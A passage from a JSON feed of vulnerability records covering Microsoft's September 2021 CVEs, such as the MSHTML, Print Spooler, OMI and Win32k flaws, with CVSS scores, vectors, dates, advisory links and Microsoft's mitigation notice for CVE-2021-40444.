"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-36952", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36952"], "modified": "2021-09-24T17:40:00", "id": "PRION:CVE-2021-36952", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-36952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:37", "description": "Microsoft Word Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38656", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38656"], "modified": "2021-09-24T19:09:00", "id": "PRION:CVE-2021-38656", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38656", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T02:35:26", "description": "Windows Scripting Engine Memory Corruption Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-26435", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435"], "modified": "2021-09-24T16:32:00", "id": "PRION:CVE-2021-26435", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-26435", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:34:27", "description": "Windows DNS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-36968", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36968"], "modified": "2021-09-24T18:20:00", "id": "PRION:CVE-2021-36968", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-36968", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:49:34", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-38647", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-38647", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T07:11:26", "description": "Microsoft MSHTML Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "prion", "title": "CVE-2021-40444", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-10-14T11:49:00", "id": "PRION:CVE-2021-40444", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-06-14T15:25:00", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38671, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-38667", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38667", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:00", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-40447.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-38671", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38671", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:00", "description": "Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-38671.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows Print Spooler Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2022-08-16T07:00:00", "id": "MS:CVE-2021-40447", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40447", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:02", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36975.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-38639", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38639", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:06", "description": "Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38639.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Win32k Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36975", "CVE-2021-38639"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-36975", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36975", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:01", "description": "Microsoft Word Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Microsoft Word Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38656"], "modified": "2021-09-14T07:00:00", "id": "MS:CVE-2021-38656", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38656", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:09", "description": "Visual Studio Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Visual Studio Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36952"], "modified": "2021-09-14T07:00:00", "id": "MS:CVE-2021-36952", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36952", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:06", "description": "Windows Scripting Engine Memory Corruption Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-26435", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26435", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:00", "description": "Microsoft Office Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Microsoft Office Graphics Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38659"], "modified": "2021-09-14T07:00:00", "id": "MS:CVE-2021-38659", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38659", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:07", "description": "Windows DNS Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows DNS Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36968"], "modified": "2021-09-14T07:00:00", "id": "MS:CVE-2021-36968", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36968", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:07", "description": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36965"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-36965", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:03", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Open Management Infrastructure Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-20T07:00:00", "id": "MS:CVE-2021-38647", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:09", "description": "Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nAn attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: \u201cSuspicious Cpl File Execution\u201d.\n\nUpon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.\n\nPlease see the **Mitigations** and **Workaround** sections for important information about steps you can take to protect your system from this vulnerability.\n\n**UPDATE** September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T07:00:00", "type": "mscve", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-16T07:00:00", "id": "MS:CVE-2021-40444", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-23T15:42:53", "description": 